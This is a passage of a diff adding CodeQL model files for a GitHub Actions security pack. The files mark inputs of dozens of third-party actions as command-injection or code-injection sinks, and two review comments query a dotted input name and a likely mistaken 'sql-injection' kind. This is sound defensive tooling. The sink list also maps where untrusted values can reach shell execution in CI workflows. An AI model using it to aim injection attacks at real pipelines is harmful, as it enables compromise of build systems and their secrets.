b/ql/lib/ext/bufbuild_buf-lint-action.model.yml index c58b5a1e1d2..aeda7998631 100644 --- a/ql/lib/ext/bufbuild_buf-lint-action.model.yml +++ b/ql/lib/ext/bufbuild_buf-lint-action.model.yml @@ -4,3 +4,8 @@ extensions: extensible: summaryModel data: - ["bufbuild/buf-lint-action", "*", "input.buf_token", "env.BUF_TOKEN", "taint"] + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["bufbuild/buf-lint-action", "*", "input.input", "command-injection"] diff --git a/ql/lib/ext/bufbuild_buf-setup-action.model.yml b/ql/lib/ext/bufbuild_buf-setup-action.model.yml new file mode 100644 index 00000000000..38b18cf6cac --- /dev/null +++ b/ql/lib/ext/bufbuild_buf-setup-action.model.yml 
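Review bot: The rows `input.blackduck.url` and `input.blackduck.api.token` in blackducksoftware_github-action.model.yml are the only input names in this patch that themselves contain dots. How the library turns the third column into an input name is not visible in this patch; if it splits on `.` rather than stripping the `input.` prefix, these two sinks would resolve to an input called `blackduck` and never match a workflow's `with:` key. A library test with a workflow that sets `blackduck.url` from an untrusted expression would settle it, and a comment such as `# input names contain dots; matched as the full string after "input."` above the rows would record the intent.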
@@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["bufbuild/buf-setup-action", "*", "input.buf_domain", "command-injection"] + - ["bufbuild/buf-setup-action", "*", "input.buf_user", "command-injection"] diff --git a/ql/lib/ext/cachix_cachix-action.model.yml b/ql/lib/ext/cachix_cachix-action.model.yml index 1c6584eb9d5..2e4291eb480 100644 --- a/ql/lib/ext/cachix_cachix-action.model.yml +++ b/ql/lib/ext/cachix_cachix-action.model.yml @@ -4,3 +4,9 @@ extensions: extensible: summaryModel data: - ["cachix/cachix-action", "*", "input.signingKey", "env.CACHIX_SIGNING_KEY", "taint"] + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["cachix/cachix-action", "*", "input.installCommand", "command-injection"] + - ["cachix/cachix-action", "*", "input.cachixBin", "command-injection"] \ No newline at end of file diff --git a/ql/lib/ext/changesets_action.model.yml b/ql/lib/ext/changesets_action.model.yml new file mode 100644 index 00000000000..3be7669275c --- /dev/null +++ b/ql/lib/ext/changesets_action.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["changesets/action", "*", "input.publish", "command-injection"] + - ["changesets/action", "*", "input.version", "command-injection"] diff --git a/ql/lib/ext/cloudflare_wrangler-action.model.yml b/ql/lib/ext/cloudflare_wrangler-action.model.yml new file mode 100644 index 00000000000..cb0870b4883 --- /dev/null +++ b/ql/lib/ext/cloudflare_wrangler-action.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["cloudflare/wrangler-action", "*", "input.preCommands", "command-injection"] + - ["cloudflare/wrangler-action", "*", "input.postCommands", "command-injection"] 
diff --git a/ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml b/ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml new file mode 100644 index 00000000000..30e59e91d60 --- /dev/null +++ b/ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["crazy-max/ghaction-chocolatey", "*", "input.args", "command-injection"] diff --git a/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml b/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml index d4e35196c6c..f3b021d226b 100644 --- a/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml +++ b/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["crazy-max/ghaction-import-gpg", "*", "input.fingerprint", "output.fingerprint", "taint"] + - ["crazy-max/ghaction-import-gpg", "*", "input.fingerprint", "output.fingerprint", "taint"] \ No newline at end of file diff --git a/ql/lib/ext/cycjimmy_semantic-release-action.model.yml b/ql/lib/ext/cycjimmy_semantic-release-action.model.yml new file mode 100644 index 00000000000..25df02dacaa --- /dev/null +++ b/ql/lib/ext/cycjimmy_semantic-release-action.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["cycjimmy/semantic-release-action", "*", "input.semantic_version", "command-injection"] + - ["cycjimmy/semantic-release-action", "*", "input.extra_plugins", "command-injection"] + - ["cycjimmy/semantic-release-action", "*", "input.extends", "command-injection"] diff --git a/ql/lib/ext/cypress-io_github-action.model.yml b/ql/lib/ext/cypress-io_github-action.model.yml new file mode 100644 index 00000000000..2fda092f20a --- /dev/null +++ b/ql/lib/ext/cypress-io_github-action.model.yml 
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sourceModel
+ data:
+ - ["cypress-io/github-action", "*", "env.GH_BRANCH", "pull_request_target", "PR branch"]
diff --git a/ql/lib/ext/dailydotdev_action-devcard.model.yml b/ql/lib/ext/dailydotdev_action-devcard.model.yml
new file mode 100644
index 00000000000..324171f3c4b
--- /dev/null
+++ b/ql/lib/ext/dailydotdev_action-devcard.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["dailydotdev/action-devcard", "*", "input.commit_branch", "sql-injection"]
+ - ["dailydotdev/action-devcard", "*", "input.commit_filename", "sql-injection"]
diff --git a/ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml b/ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml
new file mode 100644
index 00000000000..cc5c311eea7
--- /dev/null
+++ b/ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["danielpalme/reportgenerator-github-action", "*", "input.toolpath", "command-injection"]
diff --git a/ql/lib/ext/daspn_private-actions-checkout.model.yml b/ql/lib/ext/daspn_private-actions-checkout.model.yml
new file mode 100644
index 00000000000..f45aae02158
--- /dev/null
+++ b/ql/lib/ext/daspn_private-actions-checkout.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["daspn/private-actions-checkout", "*", "input.actions_list", "command-injection"]
+ - ["daspn/private-actions-checkout", "*", "input.checkout_base_path", "command-injection"]
diff --git a/ql/lib/ext/dawidd6_action-ansible-playbook.model.yml b/ql/lib/ext/dawidd6_action-ansible-playbook.model.yml
new file mode 100644
index 00000000000..7445d673fcf
--- /dev/null
+++ b/ql/lib/ext/dawidd6_action-ansible-playbook.model.yml
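Review bot: The two `dailydotdev/action-devcard` rows in dailydotdev_action-devcard.model.yml use the sink kind `sql-injection`, while every other sink row in this patch uses `command-injection` or `code-injection`. `commit_branch` and `commit_filename` read like values handed to git rather than to a database, so the kind looks like a slip. If the queries select sinks by kind (the ExpressionInjection.ql change is not visible here), rows with an unmatched kind would presumably be dropped silently and produce no alerts. Suggest `- ["dailydotdev/action-devcard", "*", "input.commit_branch", "command-injection"]` and the same for `input.commit_filename`, after confirming against the action's source how the inputs are used.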
@@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["dawidd6/action-ansible-playbook", "*", "input.playbook", "command-injection"] + - ["dawidd6/action-ansible-playbook", "*", "input.options", "command-injection"] diff --git a/ql/lib/ext/dawidd6_action-download-artifact.model.yml b/ql/lib/ext/dawidd6_action-download-artifact.model.yml new file mode 100644 index 00000000000..a8a54dbda29 --- /dev/null +++ b/ql/lib/ext/dawidd6_action-download-artifact.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sourceModel + data: + - ["dawidd6/action-download-artifact", "*", "output.artifacts", "*", "Artifact details"] diff --git a/ql/lib/ext/delaguardo_setup-clojure.model.yml b/ql/lib/ext/delaguardo_setup-clojure.model.yml index 2aa6013c872..82f491390d2 100644 --- a/ql/lib/ext/delaguardo_setup-clojure.model.yml +++ b/ql/lib/ext/delaguardo_setup-clojure.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["delaguardo/setup-clojure", "*", "input.boot", "env.BOOT_VERSION", "taint"] + - ["delaguardo/setup-clojure", "*", "input.boot", "env.BOOT_VERSION", "taint"] \ No newline at end of file diff --git a/ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml b/ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml new file mode 100644 index 00000000000..430a96f6cbe --- /dev/null +++ b/ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml 
@@ -0,0 +1,11 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["determinatesystems/magic-nix-cache-action", "*", "input.source-url", "command-injection"]
+ - ["determinatesystems/magic-nix-cache-action", "*", "input.source-tag", "command-injection"]
+ - ["determinatesystems/magic-nix-cache-action", "*", "input.source-pr", "command-injection"]
+ - ["determinatesystems/magic-nix-cache-action", "*", "input.source-branch", "command-injection"]
+ - ["determinatesystems/magic-nix-cache-action", "*", "input.source-revision", "command-injection"]
+ - ["determinatesystems/magic-nix-cache-action", "*", "input.source-binary", "command-injection"]
\ No newline at end of file
diff --git a/ql/lib/ext/docker-practice_actions-setup-docker.model.yml b/ql/lib/ext/docker-practice_actions-setup-docker.model.yml
new file mode 100644
index 00000000000..37bcf2cc781
--- /dev/null
+++ b/ql/lib/ext/docker-practice_actions-setup-docker.model.yml
@@ -0,0 +1,8 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["docker-practice/actions-setup-docker", "*", "input.docker_version", "command-injection"]
+ - ["docker-practice/actions-setup-docker", "*", "input.docker_channel", "command-injection"]
+ - ["docker-practice/actions-setup-docker", "*", "input.docker_daemon_json", "command-injection"]
diff --git a/ql/lib/ext/docker_build-push-action.model.yml b/ql/lib/ext/docker_build-push-action.model.yml
new file mode 100644
index 00000000000..77eaf3ae10f
--- /dev/null
+++ b/ql/lib/ext/docker_build-push-action.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["docker/build-push-action", "*", "input.context", "code-injection"]
\ No newline at end of file
diff --git a/ql/lib/ext/endbug_latest-tag.model.yml b/ql/lib/ext/endbug_latest-tag.model.yml
new file mode 100644
index 00000000000..63cdb2a496b
--- /dev/null
+++ b/ql/lib/ext/endbug_latest-tag.model.yml
@@ -0,0 +1,9 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["endbug/latest-tag", "*", "input.ref", "command-injection"]
+ - ["endbug/latest-tag", "*", "input.tag-name", "command-injection"]
+ - ["endbug/latest-tag", "*", "input.git-directory", "command-injection"]
+ - ["endbug/latest-tag", "*", "input.description", "command-injection"]
diff --git a/ql/lib/ext/expo_expo-github-action.model.yml b/ql/lib/ext/expo_expo-github-action.model.yml
new file mode 100644
index 00000000000..d0bcbb4da98
--- /dev/null
+++ b/ql/lib/ext/expo_expo-github-action.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["expo/expo-github-action", "*", "input.command", "command-injection"]
+ - ["expo/expo-github-action", "*", "input.packager", "command-injection"]
diff --git a/ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml b/ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml
new file mode 100644
index 00000000000..6418e71f22a
--- /dev/null
+++ b/ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["firebaseextended/action-hosting-deploy", "*", "input.firebaseToolsVersion", "command-injection"]
diff --git a/ql/lib/ext/gabrielbb_xvfb-action.model.yml b/ql/lib/ext/gabrielbb_xvfb-action.model.yml
new file mode 100644
index 00000000000..86705319e23
--- /dev/null
+++ b/ql/lib/ext/gabrielbb_xvfb-action.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["gabrielbb/xvfb-action", "*", "input.run", "command-injection"]
+ - ["gabrielbb/xvfb-action", "*", "input.options", "command-injection"]
\ No newline at end of file
diff --git a/ql/lib/ext/game-ci_unity-builder.model.yml b/ql/lib/ext/game-ci_unity-builder.model.yml new file mode 100644 index 00000000000..61fdcd9254a --- /dev/null +++ b/ql/lib/ext/game-ci_unity-builder.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["game-ci/unity-builder", "*", "input.cacheKey", "command-injection"] + - ["game-ci/unity-builder", "*", "input.unityHubVersionOnMac", "command-injection"] diff --git a/ql/lib/ext/game-ci_unity-test-runner.model.yml b/ql/lib/ext/game-ci_unity-test-runner.model.yml index ab413b6e975..2d142d98099 100644 --- a/ql/lib/ext/game-ci_unity-test-runner.model.yml +++ b/ql/lib/ext/game-ci_unity-test-runner.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["game-ci/unity-test-runner", "*", "input.artifactsPath", "output.artifactsPath", "taint"] + - ["game-ci/unity-test-runner", "*", "input.artifactsPath", "output.artifactsPath", "taint"] \ No newline at end of file diff --git a/ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml b/ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml new file mode 100644 index 00000000000..1727ca60e25 --- /dev/null +++ b/ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["gautamkrishnar/blog-post-workflow", "*", "input.item_exec", "code-injection"] \ No newline at end of file diff --git a/ql/lib/ext/go-semantic-release_action.model.yml b/ql/lib/ext/go-semantic-release_action.model.yml new file mode 100644 index 00000000000..146f4a17a55 --- /dev/null +++ b/ql/lib/ext/go-semantic-release_action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["go-semantic-release/action", "*", "input.bin", "command-injection"] 
diff --git a/ql/lib/ext/golangci_golangci-lint-action.model.yml b/ql/lib/ext/golangci_golangci-lint-action.model.yml
new file mode 100644
index 00000000000..8c0f7a5ad61
--- /dev/null
+++ b/ql/lib/ext/golangci_golangci-lint-action.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["golangci/golangci-lint-action", "*", "input.version", "command-injection"]
diff --git a/ql/lib/ext/gonuit_heroku-docker-deploy.model.yml b/ql/lib/ext/gonuit_heroku-docker-deploy.model.yml
new file mode 100644
index 00000000000..9c7c03b9f35
--- /dev/null
+++ b/ql/lib/ext/gonuit_heroku-docker-deploy.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["gonuit/heroku-docker-deploy", "*", "input.email", "command-injection"]
+ - ["gonuit/heroku-docker-deploy", "*", "input.heroku_api_key", "command-injection"]
diff --git a/ql/lib/ext/goreleaser_goreleaser-action.model.yml b/ql/lib/ext/goreleaser_goreleaser-action.model.yml
new file mode 100644
index 00000000000..9d9eac38af0
--- /dev/null
+++ b/ql/lib/ext/goreleaser_goreleaser-action.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["goreleaser/goreleaser-action", "*", "input.args", "command-injection"]
diff --git a/ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml b/ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml
new file mode 100644
index 00000000000..4c74301d1c3
--- /dev/null
+++ b/ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml
@@ -0,0 +1,9 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["gr2m/create-or-update-pull-request-action", "*", "input.branch", "command-injection"]
+ - ["gr2m/create-or-update-pull-request-action", "*", "input.path", "command-injection"]
+ - ["gr2m/create-or-update-pull-request-action", "*", "input.commit-message", "command-injection"]
+ - ["gr2m/create-or-update-pull-request-action", "*", "input.author", "command-injection"]
\ No newline at end of file
diff --git a/ql/lib/ext/ilammy_msvc-dev-cmd.model.yml b/ql/lib/ext/ilammy_msvc-dev-cmd.model.yml
new file mode 100644
index 00000000000..6332cbfdad8
--- /dev/null
+++ b/ql/lib/ext/ilammy_msvc-dev-cmd.model.yml
@@ -0,0 +1,9 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["ilammy/msvc-dev-cmd", "*", "input.vsversion", "command-injection"]
+ - ["ilammy/msvc-dev-cmd", "*", "input.arch", "command-injection"]
+ - ["ilammy/msvc-dev-cmd", "*", "input.sdk", "command-injection"]
+ - ["ilammy/msvc-dev-cmd", "*", "input.toolset", "command-injection"]
\ No newline at end of file
diff --git a/ql/lib/ext/ilammy_setup-nasm.model.yml b/ql/lib/ext/ilammy_setup-nasm.model.yml
new file mode 100644
index 00000000000..f8b8490c213
--- /dev/null
+++ b/ql/lib/ext/ilammy_setup-nasm.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["ilammy/setup-nasm", "*", "input.version", "command-injection"]
+ - ["ilammy/setup-nasm", "*", "input.destination", "command-injection"]
diff --git a/ql/lib/ext/imjohnbo_issue-bot.model.yml b/ql/lib/ext/imjohnbo_issue-bot.model.yml
new file mode 100644
index 00000000000..64024ef5c72
--- /dev/null
+++ b/ql/lib/ext/imjohnbo_issue-bot.model.yml
@@ -0,0 +1,8 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["imjohnbo/issue-bot", "*", "input.body", "code-injection"]
+ - ["imjohnbo/issue-bot", "*", "input.linked-comments-previous-issue-text", "code-injection"]
+ - ["imjohnbo/issue-bot", "*", "input.linked-comments-new-issue-text", "code-injection"]
\ No newline at end of file
diff --git a/ql/lib/ext/iterative_setup-cml.model.yml b/ql/lib/ext/iterative_setup-cml.model.yml
new file mode 100644
index 00000000000..1771ac2bad0
--- /dev/null
+++ b/ql/lib/ext/iterative_setup-cml.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["iterative/setup-cml", "*", "input.version", "command-injection"]
diff --git a/ql/lib/ext/iterative_setup-dvc.model.yml b/ql/lib/ext/iterative_setup-dvc.model.yml
new file mode 100644
index 00000000000..e8600c6f7df
--- /dev/null
+++ b/ql/lib/ext/iterative_setup-dvc.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["iterative/setup-dvc", "*", "input.version", "command-injection"]
diff --git a/ql/lib/ext/jamesives_github-pages-deploy-action.model.yml b/ql/lib/ext/jamesives_github-pages-deploy-action.model.yml
new file mode 100644
index 00000000000..2ab70905db1
--- /dev/null
+++ b/ql/lib/ext/jamesives_github-pages-deploy-action.model.yml
@@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["jamesives/github-pages-deploy-action", "*", "input.branch", "command-injection"] + - ["jamesives/github-pages-deploy-action", "*", "input.commit-message", "command-injection"] + - ["jamesives/github-pages-deploy-action", "*", "input.git-config-email", "command-injection"] + - ["jamesives/github-pages-deploy-action", "*", "input.git-config-name", "command-injection"] + - ["jamesives/github-pages-deploy-action", "*", "input.target-folder", "command-injection"] + - ["jamesives/github-pages-deploy-action", "*", "input.tag", "command-injection"] diff --git a/ql/lib/ext/johnnymorganz_stylua-action.model.yml b/ql/lib/ext/johnnymorganz_stylua-action.model.yml new file mode 100644 index 00000000000..948be24b45c --- /dev/null +++ b/ql/lib/ext/johnnymorganz_stylua-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["johnnymorganz/stylua-action", "*", "input.args", "command-injection"] diff --git a/ql/lib/ext/jurplel_install-qt-action.model.yml b/ql/lib/ext/jurplel_install-qt-action.model.yml new file mode 100644 index 00000000000..928c1f918d3 --- /dev/null +++ b/ql/lib/ext/jurplel_install-qt-action.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["jurplel/install-qt-action", "*", "input.version", "command-injection"] + - ["jurplel/install-qt-action", "*", "input.arch", "command-injection"] + - ["jurplel/install-qt-action", "*", "input.dir", "command-injection"] + - ["jurplel/install-qt-action", "*", "input.aqtversion", "command-injection"] + - ["jurplel/install-qt-action", "*", "input.py7zrversion", "command-injection"] + - ["jurplel/install-qt-action", "*", "input.extra", "command-injection"] 
diff --git a/ql/lib/ext/jwalton_gh-ecr-push.model.yml b/ql/lib/ext/jwalton_gh-ecr-push.model.yml index b237ac313d2..ad95f1f323a 100644 --- a/ql/lib/ext/jwalton_gh-ecr-push.model.yml +++ b/ql/lib/ext/jwalton_gh-ecr-push.model.yml @@ -4,3 +4,10 @@ extensions: extensible: summaryModel data: - ["jwalton/gh-ecr-push", "*", "input.image", "output.imageUrl", "taint"] + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["jwalton/gh-ecr-push", "*", "input.image", "command-injection"] + - ["jwalton/gh-ecr-push", "*", "input.local-image", "command-injection"] + - ["jwalton/gh-ecr-push", "*", "input.region", "command-injection"] diff --git a/ql/lib/ext/leafo_gh-actions-lua.model.yml b/ql/lib/ext/leafo_gh-actions-lua.model.yml new file mode 100644 index 00000000000..b3cb5aa3940 --- /dev/null +++ b/ql/lib/ext/leafo_gh-actions-lua.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["leafo/gh-actions-lua", "*", "input.luaVersion", "command-injection"] + - ["leafo/gh-actions-lua", "*", "input.luaCompileFlags", "command-injection"] diff --git a/ql/lib/ext/leafo_gh-actions-luarocks.model.yml b/ql/lib/ext/leafo_gh-actions-luarocks.model.yml new file mode 100644 index 00000000000..a84880cfdf1 --- /dev/null +++ b/ql/lib/ext/leafo_gh-actions-luarocks.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["leafo/gh-actions-luarocks", "*", "input.withLuaPath", "command-injection"] diff --git a/ql/lib/ext/lucasbento_auto-close-issues.model.yml b/ql/lib/ext/lucasbento_auto-close-issues.model.yml new file mode 100644 index 00000000000..f32484a4f0d --- /dev/null +++ b/ql/lib/ext/lucasbento_auto-close-issues.model.yml 
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["lucasbento/auto-close-issues", "*", "input.issue-close-message", "code-injection"]
\ No newline at end of file
diff --git a/ql/lib/ext/magefile_mage-action.model.yml b/ql/lib/ext/magefile_mage-action.model.yml
new file mode 100644
index 00000000000..9ce43e68a75
--- /dev/null
+++ b/ql/lib/ext/magefile_mage-action.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["magefile/mage-action", "*", "input.args", "command-injection"]
diff --git a/ql/lib/ext/maierj_fastlane-action.model.yml b/ql/lib/ext/maierj_fastlane-action.model.yml
new file mode 100644
index 00000000000..ac3aaa67def
--- /dev/null
+++ b/ql/lib/ext/maierj_fastlane-action.model.yml
@@ -0,0 +1,8 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["maierj/fastlane-action", "*", "input.lane", "command-injection"]
+ - ["maierj/fastlane-action", "*", "input.options", "command-injection"]
+ - ["maierj/fastlane-action", "*", "input.env", "command-injection"]
diff --git a/ql/lib/ext/manusa_actions-setup-minikube.model.yml b/ql/lib/ext/manusa_actions-setup-minikube.model.yml
new file mode 100644
index 00000000000..90fd673c705
--- /dev/null
+++ b/ql/lib/ext/manusa_actions-setup-minikube.model.yml
@@ -0,0 +1,9 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["manusa/actions-setup-minikube", "*", "input.kubernetes_version", "command-injection"]
+ - ["manusa/actions-setup-minikube", "*", "input.driver", "command-injection"]
+ - ["manusa/actions-setup-minikube", "*", "input.container_runtime", "command-injection"]
+ - ["manusa/actions-setup-minikube", "*", "input.start_args", "command-injection"]
diff --git a/ql/lib/ext/mattdavis0351_actions.model.yml b/ql/lib/ext/mattdavis0351_actions.model.yml index 91741f58706..2c9f46b46f4 100644 --- a/ql/lib/ext/mattdavis0351_actions.model.yml +++ b/ql/lib/ext/mattdavis0351_actions.model.yml @@ -5,3 +5,12 @@ extensions: data: - ["mattdavis0351/actions", "*", "input.image-name", "output.imageUrl", "taint"] - ["mattdavis0351/actions", "*", "input.tag", "output.imageUrl", "taint"] + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["mattdavis0351/actions", "*", "input.repo-token", "command-injection"] + - ["mattdavis0351/actions", "*", "input.dockerfile-location", "command-injection"] + - ["mattdavis0351/actions", "*", "input.image-name", "command-injection"] + - ["mattdavis0351/actions", "*", "input.dockerfile-name", "command-injection"] + - ["mattdavis0351/actions", "*", "input.tag", "command-injection"] diff --git a/ql/lib/ext/meteorengineer_setup-meteor.model.yml b/ql/lib/ext/meteorengineer_setup-meteor.model.yml new file mode 100644 index 00000000000..1bcf8e7ce7a --- /dev/null +++ b/ql/lib/ext/meteorengineer_setup-meteor.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["meteorengineer/setup-meteor", "*", "input.meteor-release", "command-injection"] diff --git a/ql/lib/ext/microsoft_setup-msbuild.model.yml b/ql/lib/ext/microsoft_setup-msbuild.model.yml new file mode 100644 index 00000000000..81706744568 --- /dev/null +++ b/ql/lib/ext/microsoft_setup-msbuild.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["microsoft/setup-msbuild", "*", "input.vs-version", "command-injection"] + - ["microsoft/setup-msbuild", "*", "input.vswhere-path", "command-injection"] 
diff --git a/ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml b/ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml new file mode 100644 index 00000000000..aeca6db0d98 --- /dev/null +++ b/ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml @@ -0,0 +1,16 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["mr-smithers-excellent/docker-build-push", "*", "input.tags", "command-injection"] + - ["mr-smithers-excellent/docker-build-push", "*", "input.buildArgs", "command-injection"] + - ["mr-smithers-excellent/docker-build-push", "*", "input.labels", "command-injection"] + - ["mr-smithers-excellent/docker-build-push", "*", "input.target", "command-injection"] + - ["mr-smithers-excellent/docker-build-push", "*", "input.directory", "command-injection"] + - ["mr-smithers-excellent/docker-build-push", "*", "input.platform", "command-injection"] + - ["mr-smithers-excellent/docker-build-push", "*", "input.image", "command-injection"] + - ["mr-smithers-excellent/docker-build-push", "*", "input.registry", "command-injection"] + - ["mr-smithers-excellent/docker-build-push", "*", "input.dockerfile", "command-injection"] + - ["mr-smithers-excellent/docker-build-push", "*", "input.githubOrg", "command-injection"] + - ["mr-smithers-excellent/docker-build-push", "*", "input.username", "command-injection"] \ No newline at end of file diff --git a/ql/lib/ext/msys2_setup-msys2.model.yml b/ql/lib/ext/msys2_setup-msys2.model.yml new file mode 100644 index 00000000000..b9358bd2d69 --- /dev/null +++ b/ql/lib/ext/msys2_setup-msys2.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["msys2/setup-msys2", "*", "input.install", "command-injection"] + - ["msys2/setup-msys2", "*", "input.pacboy", "command-injection"] \ No newline at end of file 
